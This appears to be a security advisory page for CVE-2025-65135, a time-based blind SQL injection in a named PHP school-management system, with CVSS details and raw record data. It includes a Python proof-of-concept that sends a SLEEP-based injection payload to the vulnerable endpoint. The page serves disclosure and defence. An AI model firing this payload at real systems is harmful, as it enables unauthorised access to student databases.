Security Vulnerability Report
中文
CVE-2025-65135 CVSS 9.8 CRITICAL

CVE-2025-65135

Published: 2026-04-14 16:16:35
Last Modified: 2026-04-17 15:33:34

Description

In manikandan580 School-management-system 1.0, a time-based blind SQL injection vulnerability exists in /studentms/admin/between-date-reprtsdetails.php through the fromdate POST parameter.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

manikandan580 School-management-system 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_sqli(url): target_url = f"{url}/studentms/admin/between-date-reprtsdetails.php" # Payload to trigger a 5-second delay if the SQL injection is successful payload = "2025-01-01' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -" data = { "fromdate": payload } try: print(f"[+] Sending payload to {target_url}...") response = requests.post(target_url, data=data, timeout=10) # Check if the response time indicates the sleep was executed if response.elapsed.total_seconds() >= 5: print("[!] Vulnerable! Time-based blind SQL injection confirmed.") else: print("[-] Not vulnerable or payload failed.") except requests.exceptions.RequestException as e: print(f"[Error] {e}") if __name__ == "__main__": target = "http://localhost" # Replace with the actual target URL check_sqli(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65135", "sourceIdentifier": "[email protected]", "published": "2026-04-14T16:16:34.503", "lastModified": "2026-04-17T15:33:34.050", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In manikandan580 School-management-system 1.0, a time-based blind SQL injection vulnerability exists in /studentms/admin/between-date-reprtsdetails.php through the fromdate POST parameter."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/TREXNEGRO/Security-Advisories/tree/main/CVE-2025-65135", "source": "[email protected]"}, {"url": "https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65135/poc.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}